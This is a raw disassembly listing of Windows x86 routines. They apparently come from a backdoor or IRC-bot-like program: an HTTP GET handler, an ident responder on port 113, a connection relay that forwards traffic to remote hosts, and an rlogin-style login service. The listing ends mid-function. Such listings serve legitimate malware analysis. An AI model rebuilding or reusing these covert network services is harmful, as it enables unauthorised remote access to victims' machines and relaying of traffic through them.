var_358 = dword ptr -358h
var_354 = dword ptr -354h
var_350 = dword ptr -350h
var_34C = dword ptr -34Ch
var_340 = byte ptr -340h
var_23C = byte ptr -23Ch
var_138 = byte ptr -138h
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
Dst = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov eax, 28F0h
lea ebp, [esp-74h]
call __alloca_probe
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0ECh
lea edi, [ebp+74h+var_6F0]
rep movsd
xor esi, esi
inc esi
push 10h ; Size
mov [eax+3ACh], esi
xor ebx, ebx
lea eax, [ebp+74h+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+74h+var_10], esi
call _memset
add esp, 0Ch
push [ebp+74h+var_360]
mov [ebp+74h+Dst], 2
call dword_444260 ; htons
push ebx
push esi
push 2
mov [ebp+74h+var_22], ax
mov [ebp+74h+var_20], ebx
call dword_444100 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+74h+var_8], edi
jz loc_4131AF
mov eax, [ebp+74h+var_358]
imul eax, 234h
mov dword_4444F4[eax], edi
push 10h
lea eax, [ebp+74h+Dst]
push eax
push edi
call dword_4441E4 ; bind
cmp eax, 0FFFFFFFFh
jz loc_4131AF
push 7FFFFFFFh
push edi
call dword_444230 ; listen
cmp eax, 0FFFFFFFFh
jz loc_4131AF
lea eax, [ebp+74h+var_10]
push eax
push 8004667Eh
push edi
call dword_444094 ; ioctlsocket
cmp eax, 0FFFFFFFFh
jz loc_4131AF
push 41h
pop ecx
push ebx
push ebx
lea eax, [ebp+74h+var_23C]
push ebx
push eax
mov [ebp+74h+var_124], edi
mov [ebp+74h+var_128], esi
mov [ebp+74h+var_C], edi
mov eax, edi
loc_412EBF: ; CODE XREF: sub_412DD9+3CE�j
inc eax
lea esi, [ebp+74h+var_128]
lea edi, [ebp+74h+var_23C]
push eax
rep movsd
call dword_4441B0 ; select
cmp eax, 0FFFFFFFFh
jz loc_4131AC
xor esi, esi
mov [ebp+74h+arg_0], esi
loc_412EE3: ; CODE XREF: sub_412DD9+3B8�j
lea eax, [ebp+74h+var_23C]
push eax
push esi
call dword_44415C ; __WSAFDIsSet
test eax, eax
jz loc_413187
cmp esi, [ebp+74h+var_8]
jnz short loc_412F63
lea eax, [ebp+74h+var_14]
push eax
lea eax, [ebp+74h+var_138]
push eax
push [ebp+74h+var_8]
mov [ebp+74h+var_14], 10h
call dword_4440BC ; accept
cmp eax, 0FFFFFFFFh
jz loc_413187
mov edx, [ebp+74h+var_128]
xor ecx, ecx
cmp edx, ebx
jbe short loc_412F3C
loc_412F2E: ; CODE XREF: sub_412DD9+161�j
cmp [ebp+ecx*4+74h+var_124], eax
jz short loc_412F3C
inc ecx
cmp ecx, edx
jb short loc_412F2E
loc_412F3C: ; CODE XREF: sub_412DD9+153�j
; sub_412DD9+15C�j
cmp ecx, edx
jnz short loc_412F52
cmp edx, 40h
jnb short loc_412F52
mov [ebp+ecx*4+74h+var_124], eax
loc_412F4C: ; DATA XREF: .rdata:off_439424�o
inc [ebp+74h+var_128]
loc_412F52: ; CODE XREF: sub_412DD9+165�j
; sub_412DD9+16A�j
cmp eax, [ebp+74h+var_C]
jbe loc_413187
mov [ebp+74h+var_C], eax
jmp loc_413187
; ---------------------------------------------------------------------------
loc_412F63: ; CODE XREF: sub_412DD9+123�j
mov edi, 1000h
push edi ; Size
lea eax, [ebp+74h+Str]
push ebx ; Val
push eax ; Dst
call _memset
push edi ; Size
lea eax, [ebp+74h+Str1]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 18h
push ebx
push edi
lea eax, [ebp+74h+Str]
push eax
push esi
call dword_444064 ; recv
test eax, eax
jg short loc_412FEC
push esi
call dword_444218 ; closesocket
xor eax, eax
cmp [ebp+74h+var_128], ebx
jbe loc_413187
loc_412FB0: ; CODE XREF: sub_412DD9+1E7�j
cmp [ebp+eax*4+74h+var_124], esi
jz short loc_412FD6
inc eax
cmp eax, [ebp+74h+var_128]
jb short loc_412FB0
jmp loc_413187
; ---------------------------------------------------------------------------
loc_412FC7: ; CODE XREF: sub_412DD9+206�j
mov ecx, [ebp+eax*4+74h+var_120]
mov [ebp+eax*4+74h+var_124], ecx
inc eax
loc_412FD6: ; CODE XREF: sub_412DD9+1DE�j
mov ecx, [ebp+74h+var_128]
dec ecx
cmp eax, ecx
jb short loc_412FC7
dec [ebp+74h+var_128]
jmp loc_413187
; ---------------------------------------------------------------------------
loc_412FEC: ; CODE XREF: sub_412DD9+1C0�j
push 104h ; Size
lea eax, [ebp+74h+var_340]
push ebx ; Val
push eax ; Dst
call _memset
lea eax, [ebp+74h+Str]
push eax ; Str
mov [ebp+74h+var_4], ebx
xor esi, esi
call _strlen
add esp, 10h
test eax, eax
jbe loc_413187
loc_41301A: ; CODE XREF: sub_412DD9+2F9�j
mov eax, [ebp+74h+var_4]
mov al, [ebp+eax+74h+Str]
cmp al, 0Ah
mov [ebp+esi+74h+Str1], al
jnz loc_4130BE
mov esi, offset aGet_0 ; "GET "
lea eax, [ebp+74h+Str1]
push esi ; SubStr
push eax ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_413093
lea eax, [ebp+74h+Str1]
push eax ; Str
call _strlen
cmp eax, 5
pop ecx
jbe short loc_413093
mov eax, offset asc_42FE58 ; " "
push eax ; Delim
push eax ; SubStr
lea eax, [ebp+74h+Str1]
push esi ; SubStr
push eax ; Str
call _strstr
pop ecx
pop ecx
push eax ; Str
call _strstr
pop ecx
pop ecx
push eax ; Str
call _strtok
push eax ; Source
lea eax, [ebp+74h+var_340]
push eax ; Dest
call _strcpy
add esp, 10h
jmp short loc_4130AA
; ---------------------------------------------------------------------------
loc_413093: ; CODE XREF: sub_412DD9+270�j
; sub_412DD9+282�j
lea eax, [ebp+74h+Str1]
push offset asc_434A60 ; "\r\n"
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_4130DD
loc_4130AA: ; CODE XREF: sub_412DD9+2B8�j
push edi ; Size
lea eax, [ebp+74h+Str1]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
or esi, 0FFFFFFFFh
loc_4130BE: ; CODE XREF: sub_412DD9+254�j
inc [ebp+74h+var_4]
lea eax, [ebp+74h+Str]
push eax ; Str
inc esi
call _strlen
cmp [ebp+74h+var_4], eax
pop ecx
jb loc_41301A
jmp loc_413187
; ---------------------------------------------------------------------------
loc_4130DD: ; CODE XREF: sub_412DD9+2CF�j
mov ecx, [ebp+74h+var_128]
xor eax, eax
cmp ecx, ebx
jbe short loc_41311C
loc_4130E9: ; CODE XREF: sub_412DD9+31F�j
mov edx, [ebp+eax*4+74h+var_124]
cmp edx, [ebp+74h+arg_0]
jz short loc_413111
inc eax
cmp eax, ecx
jb short loc_4130E9
jmp short loc_41311C
; ---------------------------------------------------------------------------
loc_4130FC: ; CODE XREF: sub_412DD9+33B�j
mov ecx, [ebp+eax*4+74h+var_120]
mov [ebp+eax*4+74h+var_124], ecx
mov ecx, [ebp+74h+var_128]
inc eax
loc_413111: ; CODE XREF: sub_412DD9+31A�j
dec ecx
cmp eax, ecx
jb short loc_4130FC
dec [ebp+74h+var_128]
loc_41311C: ; CODE XREF: sub_412DD9+30E�j
; sub_412DD9+321�j
lea eax, [ebp+74h+var_464]
push eax ; Str
call _strlen
mov esi, eax
lea eax, [ebp+74h+var_340]
push eax ; Str
call _strlen
add esi, eax
cmp esi, 104h
pop ecx
pop ecx
jnb short loc_41317E
lea eax, [ebp+74h+var_4]
push eax
push 8004667Eh
push [ebp+74h+arg_0]
mov [ebp+74h+var_4], ebx
call dword_444094 ; ioctlsocket
push [ebp+74h+var_358]
lea eax, [ebp+74h+var_340]
push [ebp+74h+var_34C]
push eax
lea eax, [ebp+74h+var_464]
push eax
push [ebp+74h+arg_0]
call sub_412B2A
add esp, 14h
jmp short loc_413187
; ---------------------------------------------------------------------------
loc_41317E: ; CODE XREF: sub_412DD9+367�j
push [ebp+74h+arg_0]
call dword_444218 ; closesocket
loc_413187: ; CODE XREF: sub_412DD9+11A�j
; sub_412DD9+143�j ...
mov esi, [ebp+74h+arg_0]
inc esi
cmp esi, [ebp+74h+var_C]
mov [ebp+74h+arg_0], esi
jbe loc_412EE3
push 41h
pop ecx
push ebx
push ebx
lea eax, [ebp+74h+var_23C]
push ebx
push eax
mov eax, [ebp+74h+var_C]
jmp loc_412EBF
; ---------------------------------------------------------------------------
loc_4131AC: ; CODE XREF: sub_412DD9+FF�j
mov edi, [ebp+74h+var_8]
loc_4131AF: ; CODE XREF: sub_412DD9+6C�j
; sub_412DD9+94�j ...
call dword_4441C4 ; WSAGetLastError
push eax
lea eax, [ebp+74h+Dest]
push offset asc_434A38 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+74h+var_350], ebx
jnz short loc_4131F5
push ebx ; int
push [ebp+74h+var_354] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+var_6EC]
push eax ; Str
push [ebp+74h+var_6F0] ; int
call sub_40123B
add esp, 14h
loc_4131F5: ; CODE XREF: sub_412DD9+3F7�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
pop ecx
push edi
call dword_444218 ; closesocket
push [ebp+74h+var_358]
call sub_40B149
pop ecx
push ebx
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_412DD9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_41321D proc near ; DATA XREF: sub_40274D+406C�o
; WinMain(x,x,x,x)+42C�o
Str = byte ptr -238h
Dest = byte ptr -38h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
Dst = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 238h
push ebx
push esi
push edi
push 10h
pop edi
xor esi, esi
push edi ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
mov [ebp+var_8], esi
call _memset
add esp, 0Ch
push 71h
mov [ebp+Dst], 2
call dword_444260 ; htons
push esi
push 1
push 2
mov [ebp+var_1A], ax
mov [ebp+var_18], esi
call dword_444100 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_413390
mov eax, [ebp+arg_0]
imul eax, 234h
mov dword_4444F4[eax], ebx
push edi
lea eax, [ebp+Dst]
push eax
push ebx
call dword_4441E4 ; bind
cmp eax, 0FFFFFFFFh
jz loc_413390
push 5
push ebx
call dword_444230 ; listen
cmp eax, 0FFFFFFFFh
jz loc_413390
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_2C]
push eax
push ebx
mov [ebp+var_C], edi
call dword_4440BC ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_413390
mov edi, 200h
loc_4132C3: ; CODE XREF: sub_41321D+168�j
movzx eax, [ebp+var_2A]
push eax
push [ebp+var_28]
call dword_444188 ; inet_ntoa
push eax
lea eax, [ebp+Str]
push offset asc_434AB0 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Str]
push eax
call sub_417D70
add esp, 14h
push esi
push edi
lea eax, [ebp+Str]
push eax
push [ebp+var_4]
call dword_444064 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_413370
lea eax, [ebp+Str]
push esi ; int
push eax ; Str
call sub_41AC0E
push 0Ch ; Size
lea eax, [ebp+Dest]
push esi ; Val
push eax ; Dst
call _memset
push esi ; Str1
push esi ; int
lea eax, [ebp+Dest]
push 2 ; int
push eax ; Dest
call sub_40AB83
push eax
push offset aUseridUnixS ; " : USERID : UNIX : %s\r\n"
lea eax, [ebp+Str]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 34h
lea eax, [ebp+Str]
push esi
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+var_4]
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_413370
mov [ebp+var_8], 1
loc_413370: ; CODE XREF: sub_41321D+EA�j
; sub_41321D+14A�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_2C]
push eax
push ebx
call dword_4440BC ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz loc_4132C3
cmp [ebp+var_8], esi
jnz short loc_4133B7
loc_413390: ; CODE XREF: sub_41321D+47�j
; sub_41321D+6B�j ...
call dword_4441C4 ; WSAGetLastError
push eax
lea eax, [ebp+Str]
push offset asc_434A6C ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Str]
push eax
call sub_417D70
add esp, 10h
loc_4133B7: ; CODE XREF: sub_41321D+171�j
push ebx
call dword_444218 ; closesocket
push [ebp+var_4]
call dword_444218 ; closesocket
push [ebp+arg_0]
call sub_40B149
pop ecx
push esi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_41321D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4133D8 proc near ; DATA XREF: sub_413483+132�o
Dst = byte ptr -1128h
var_128 = byte ptr -128h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1128h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_128]
rep movsd
mov edi, 1000h
push edi ; Size
mov dword ptr [eax+124h], 1
xor ebx, ebx
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
mov esi, [ebp+var_14]
imul esi, 234h
jmp short loc_41344A
; ---------------------------------------------------------------------------
loc_413422: ; CODE XREF: sub_4133D8+8C�j
push ebx
push eax
lea eax, [ebp+Dst]
push eax
push dword_4444F4[esi]
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_413466
push edi ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
loc_41344A: ; CODE XREF: sub_4133D8+48�j
add esp, 0Ch
push ebx
push edi
lea eax, [ebp+Dst]
push eax
push dword_4444F8[esi]
call dword_444064 ; recv
cmp eax, ebx
jg short loc_413422
loc_413466: ; CODE XREF: sub_4133D8+62�j
push dword_4444F8[esi]
call dword_444218 ; closesocket
push [ebp+var_14]
call sub_40B149
pop ecx
push ebx
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_4133D8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=74h
sub_413483 proc near ; DATA XREF: sub_41366C+126�o
var_1344 = byte ptr -1344h
Source = byte ptr -344h
var_144 = byte ptr -144h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
Dst = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov eax, 1344h
lea ebp, [esp-74h]
call __alloca_probe
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_144]
rep movsd
mov edi, [ebp+74h+var_30]
xor ecx, ecx
inc ecx
push 6
push ecx
push 2
mov [eax+120h], ecx
mov [ebp+74h+var_4], edi
call dword_444100 ; socket
mov esi, eax
xor ebx, ebx
cmp esi, 0FFFFFFFFh
mov [ebp+74h+arg_0], esi
jz loc_4135E8
push 10h ; Size
lea eax, [ebp+74h+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push [ebp+74h+var_3C]
mov [ebp+74h+Dst], 2
call dword_444260 ; htons
mov [ebp+74h+var_16], ax
lea eax, [ebp+74h+var_13C]
push eax
call dword_44417C ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+74h+var_8], eax
jnz short loc_413515
lea eax, [ebp+74h+var_13C]
push eax
call dword_444168 ; gethostbyname
jmp short loc_413523
; ---------------------------------------------------------------------------
loc_413515: ; CODE XREF: sub_413483+81�j
push 2
push 4
lea eax, [ebp+74h+var_8]
push eax
call dword_4441FC ; gethostbyaddr
loc_413523: ; CODE XREF: sub_413483+90�j
cmp eax, ebx
jz loc_4135E8
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+74h+var_14], eax
push 10h
lea eax, [ebp+74h+Dst]
push eax
push esi
call dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jz loc_4135E8
push [ebp+74h+var_34]
movzx eax, [ebp+74h+var_16]
push eax
push [ebp+74h+var_14]
mov [ebp+74h+var_20], ebx
call dword_444188 ; inet_ntoa
push eax
lea eax, [ebp+74h+Source]
push offset asc_434B20 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+74h+Source]
push 18h ; int
push eax ; Source
call sub_40AE85
imul edi, 234h
mov ecx, [ebp+74h+var_34]
mov [ebp+74h+var_30], eax
imul eax, 234h
mov dword_4444EC[eax], ecx
add esp, 20h
lea edi, dword_4444F4[edi]
mov ecx, [edi]
mov dword_4444F8[eax], ecx
lea eax, [ebp+74h+var_1C]
push eax
push ebx
lea eax, [ebp+74h+var_144]
push eax
push offset sub_4133D8
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+74h+var_30]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_41361E
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax ; Args
push offset asc_434AE0 ; "-"
call sub_417DE4
pop ecx
pop ecx
loc_4135E8: ; CODE XREF: sub_413483+46�j
; sub_413483+A2�j ...
mov eax, [ebp+74h+var_4]
imul eax, 234h
push dword_4444F4[eax]
call dword_444218 ; closesocket
push [ebp+74h+arg_0]
call dword_444218 ; closesocket
push [ebp+74h+var_4]
call sub_40B149
pop ecx
push ebx
call ds:dword_42B068 ; ExitThread
loc_413616: ; CODE XREF: sub_413483+19E�j
push 32h
call ds:dword_42B014 ; Sleep
loc_41361E: ; CODE XREF: sub_413483+150�j
cmp [ebp+74h+var_20], ebx
jz short loc_413616
mov esi, 1000h
jmp short loc_413641
; ---------------------------------------------------------------------------
loc_41362A: ; CODE XREF: sub_413483+1E2�j
push ebx
push eax
lea eax, [ebp+74h+var_1344]
push eax
push [ebp+74h+arg_0]
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4135E8
loc_413641: ; CODE XREF: sub_413483+1A5�j
push esi ; Size
lea eax, [ebp+74h+var_1344]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push ebx
push esi
lea eax, [ebp+74h+var_1344]
push eax
push dword ptr [edi]
call dword_444064 ; recv
cmp eax, ebx
jg short loc_41362A
jmp loc_4135E8
sub_413483 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_41366C proc near ; DATA XREF: sub_40274D+5E41�o
Source = byte ptr -350h
var_150 = byte ptr -150h
var_14C = dword ptr -14Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_30 = dword ptr -30h
var_28 = byte ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = byte ptr -18h
Dst = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 350h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
push 10h
lea edi, [ebp+74h+var_150]
rep movsd
pop edi
push edi ; Size
mov dword ptr [eax+120h], 1
xor esi, esi
lea eax, [ebp+74h+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push [ebp+74h+var_44]
mov [ebp+74h+Dst], 2
call dword_444260 ; htons
push 6
push 1
push 2
mov [ebp+74h+var_12], ax
mov [ebp+74h+var_10], esi
mov [ebp+74h+var_4], edi
call dword_444100 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+74h+arg_0], eax
jz loc_4137D9
mov ecx, [ebp+74h+var_40]
imul ecx, 234h
push 1
push 401h
push esi
push eax
mov dword_4444F4[ecx], eax
call dword_444194 ; WSAAsyncSelect
push edi
lea eax, [ebp+74h+Dst]
push eax
push [ebp+74h+arg_0]
call dword_4441E4 ; bind
test eax, eax
jnz loc_4137D9
push 0Ah
push [ebp+74h+arg_0]
call dword_444230 ; listen
test eax, eax
jnz loc_4137D9
loc_41371E: ; CODE XREF: sub_41366C+C8�j
; sub_41366C+168�j
lea eax, [ebp+74h+var_4]
push eax
lea eax, [ebp+74h+var_28]
push eax
push [ebp+74h+arg_0]
call dword_4440BC ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_41371E
push [ebp+74h+var_40]
movzx eax, [ebp+74h+var_26]
push eax
push [ebp+74h+var_24]
mov [ebp+74h+var_14C], edi
mov [ebp+74h+var_30], esi
call dword_444188 ; inet_ntoa
push eax
lea eax, [ebp+74h+Source]
push offset asc_434BA0 ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+74h+Source]
push 18h ; int
push eax ; Source
call sub_40AE85
mov ecx, [ebp+74h+var_40]
mov [ebp+74h+var_3C], eax
imul eax, 234h
add esp, 20h
mov dword_4444EC[eax], ecx
lea eax, [ebp+74h+var_18]
push eax
push esi
lea eax, [ebp+74h+var_150]
push eax
push offset sub_413483
push esi
push esi
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+74h+var_3C]
imul ecx, 234h
cmp eax, esi
mov dword_4444FC[ecx], eax
jnz short loc_4137CF
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax ; Args
push offset asc_434B64 ; "-"
call sub_417DE4
pop ecx
pop ecx
jmp short loc_4137DC
; ---------------------------------------------------------------------------
loc_4137C7: ; CODE XREF: sub_41366C+166�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4137CF: ; CODE XREF: sub_41366C+144�j
cmp [ebp+74h+var_30], esi
jz short loc_4137C7
jmp loc_41371E
; ---------------------------------------------------------------------------
loc_4137D9: ; CODE XREF: sub_41366C+65�j
; sub_41366C+99�j ...
mov edi, [ebp+74h+arg_0]
loc_4137DC: ; CODE XREF: sub_41366C+159�j
push edi
call dword_444218 ; closesocket
push [ebp+74h+arg_0]
call dword_444218 ; closesocket
push [ebp+74h+var_40]
call sub_40B149
pop ecx
push esi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_41366C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4137FD proc near ; CODE XREF: sub_413848+A3�p
; sub_413848+B3�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov esi, eax
loc_413804: ; CODE XREF: sub_4137FD+2A�j
push 0
push 1
lea eax, [ebp+var_1]
push eax
push [ebp+arg_0]
call dword_444064 ; recv
cmp eax, 1
jnz short loc_41383A
mov al, [ebp+var_1]
mov [esi], al
inc esi
dec [ebp+arg_4]
jz short loc_41382F
test al, al
jnz short loc_413804
xor eax, eax
inc eax
loc_41382C: ; CODE XREF: sub_4137FD+3F�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_41382F: ; CODE XREF: sub_4137FD+26�j
push offset asc_434BE8 ; "-"
call sub_417DE4
pop ecx
loc_41383A: ; CODE XREF: sub_4137FD+1B�j
xor eax, eax
jmp short loc_41382C
sub_4137FD endp
; =============== S U B R O U T I N E =======================================
sub_41383E proc near ; DATA XREF: sub_413A51+5C�o
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
setz al
retn
sub_41383E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_413848 proc near ; DATA XREF: sub_413A51+1A6�o
var_3D4 = byte ptr -3D4h
Str1 = byte ptr -350h
var_208 = dword ptr -208h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_F0 = byte ptr -0F0h
Dest = byte ptr -0B0h
var_4C = byte ptr -4Ch
var_3C = byte ptr -3Ch
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
Args = byte ptr -1Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 3D4h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_3D4]
rep movsd
mov esi, [ebp+74h+var_208]
mov [ebp+74h+arg_0], esi
imul esi, 234h
xor ebx, ebx
inc ebx
mov [eax+1DCh], ebx
mov eax, dword_4444F4[esi]
mov [ebp+74h+var_1F0], eax
xor edi, edi
lea eax, [ebp+74h+var_C]
push eax
push edi
push edi
lea eax, [ebp+74h+var_1F4]
push eax
push edi
mov [ebp+74h+var_C], 1Eh
mov [ebp+74h+var_8], edi
mov [ebp+74h+var_1F4], ebx
call dword_4441B0 ; select
test eax, eax
jnz short loc_4138CE
push dword_4444F4[esi]
loc_4138BA: ; CODE XREF: sub_413848+19F�j
call dword_444218 ; closesocket
push [ebp+74h+arg_0]
call sub_40B149
pop ecx
jmp loc_413A49
; ---------------------------------------------------------------------------
loc_4138CE: ; CODE XREF: sub_413848+6A�j
push edi
push ebx
lea eax, [ebp+74h+var_3C]
push eax
push dword_4444F4[esi]
call dword_444064 ; recv
push 10h
push dword_4444F4[esi]
lea eax, [ebp+74h+Args]
call sub_4137FD
push 10h
push dword_4444F4[esi]
lea eax, [ebp+74h+var_4C]
call sub_4137FD
push 40h
push dword_4444F4[esi]
lea eax, [ebp+74h+var_F0]
call sub_4137FD
add esp, 18h
lea eax, [ebp+74h+var_4]
push eax
lea eax, [ebp+74h+var_2C]
push eax
push dword_4444F4[esi]
mov [ebp+74h+var_4], 10h
call dword_444148 ; getpeername
test eax, eax
jz short loc_413953
call dword_4441C4 ; WSAGetLastError
push eax ; Args
push offset asc_434CE0 ; "-"
call sub_417DE4
push [ebp+74h+arg_0]
call sub_40B149
add esp, 0Ch
jmp loc_413A49
; ---------------------------------------------------------------------------
loc_413953: ; CODE XREF: sub_413848+E8�j
push 2
push 4
lea eax, [ebp+74h+var_28]
push eax
call dword_4441FC ; gethostbyaddr
cmp eax, edi
jnz short loc_41397A
push [ebp+74h+var_28]
call dword_444188 ; inet_ntoa
push eax ; Format
lea eax, [ebp+74h+Dest]
push eax ; Dest
call _sprintf
jmp short loc_413985
; ---------------------------------------------------------------------------
loc_41397A: ; CODE XREF: sub_413848+11B�j
push dword ptr [eax] ; Source
lea eax, [ebp+74h+Dest]
push eax ; Dest
call _strcpy
loc_413985: ; CODE XREF: sub_413848+130�j
pop ecx
pop ecx
push edi
push ebx
push offset byte_42B633
push dword_4444F4[esi]
call dword_4441A0 ; send
cmp dword_4D5268, edi
jnz short loc_4139EC
lea eax, [ebp+74h+Args]
push eax ; Str2
lea eax, [ebp+74h+Str1]
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_4139EC
lea eax, [ebp+74h+Dest]
push eax
lea eax, [ebp+74h+Args]
push eax ; Args
push offset asc_434C14 ; "-"
call sub_417DE4
add esp, 0Ch
push edi
push 13h
push offset aPermissionDeni ; "Permission denied\n"
push dword_4444F4[esi]
call dword_4441A0 ; send
push dword_4444F4[esi]
jmp loc_4138BA
; ---------------------------------------------------------------------------
loc_4139EC: ; CODE XREF: sub_413848+158�j
; sub_413848+16E�j
lea eax, [ebp+74h+Dest]
push eax
lea eax, [ebp+74h+Args]
push eax ; Args
push offset asc_434CA4 ; "-"
call sub_417DE4
push [ebp+74h+arg_0]
call sub_414056
add esp, 10h
test eax, eax
jnz short loc_413A2C
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax ; Args
push offset asc_434C78 ; "-"
call sub_417DE4
push [ebp+74h+arg_0]
call sub_40B149
add esp, 0Ch
push ebx
jmp short loc_413A4A
; ---------------------------------------------------------------------------
loc_413A2C: ; CODE XREF: sub_413848+1C3�j
lea eax, [ebp+74h+Dest]
push eax
lea eax, [ebp+74h+Args]
push eax ; Args
push offset asc_434C4C ; "-"
call sub_417DE4
push [ebp+74h+arg_0]
call sub_40B149
add esp, 10h
loc_413A49: ; CODE XREF: sub_413848+81�j
; sub_413848+106�j
push edi
loc_413A4A: ; CODE XREF: sub_413848+1E2�j
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_413848 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_413A51 proc near ; DATA XREF: sub_40274D+219E�o
var_5A8 = byte ptr -5A8h
Source = byte ptr -418h
var_218 = dword ptr -218h
Str = byte ptr -214h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
Dst = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
